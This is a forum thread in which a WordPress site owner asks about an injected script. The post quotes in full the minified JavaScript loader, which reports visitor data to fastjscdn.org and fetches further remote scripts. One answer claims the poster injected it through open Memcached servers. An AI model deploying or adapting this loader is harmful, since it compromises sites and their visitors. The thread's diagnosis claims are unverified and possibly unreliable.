skip to Main Content

In my WordPress site, i have this malicious code before "/body":

<script src="https://fastjscdn.org/static.js?hash=a633f506a53746a846742c5655ebf596"></script>

The file static.js contains this:

window.__google__ads__show||(window.__google__ads__show="1",function(){if(function t(){try{return window.self!==window.top}catch(a){return!0}}()){var t,a,e=window.parent.document.createElement("script");e.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(e);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{}),t="https://fastjscdn.org/"+window.location.hostname.replace("www.","")+"/static.js",(a=document.createElement("script")).src=t,document.head.appendChild(a)}());

Before "fastjscdn .org", the maliciuos JS code was hosting on domanin name "asmr9999 .live". Since few days, the domain has changed in "fastjscdn .org".

How is it possible? How can it change the domain where is it hosted?

I am sure that WordPress, themes and plugins do not contain the malicious code. I didn’t find anything in the database, also in base64 encode, for now.

Also, What does the code in the JS file do to my site?

I also found other people with my same malware, in a custom CMS, we can not solve the problem in any way. More info here

2

Answers


    • You can use an online JavaScript beautifier tool to check the content of static.js: seems to be injecting script adapted to the platform, probably the same that you mentioned in your other question that will trigger the download of a malware/adware
    • The reason why it could change the domain in the script is probably because your host is still infected; the domain was registered very recently, and was probably chosen as it looks less suspicious than the previous one
    Login or Signup to reply.
  1. It maybe late,but let me tell the truth.The problem is the Memcached server you are using which is public and no password in network.I made a script scanning the network and injecting this malicious code to every memcached server.It’s a "cache-side" xss attack.Your server is safe.Configure your firewall and block connection from outside to port 11211,everything will ok.

    Login or Signup to reply.
Please signup or login to give your own answer.
Back To Top
Search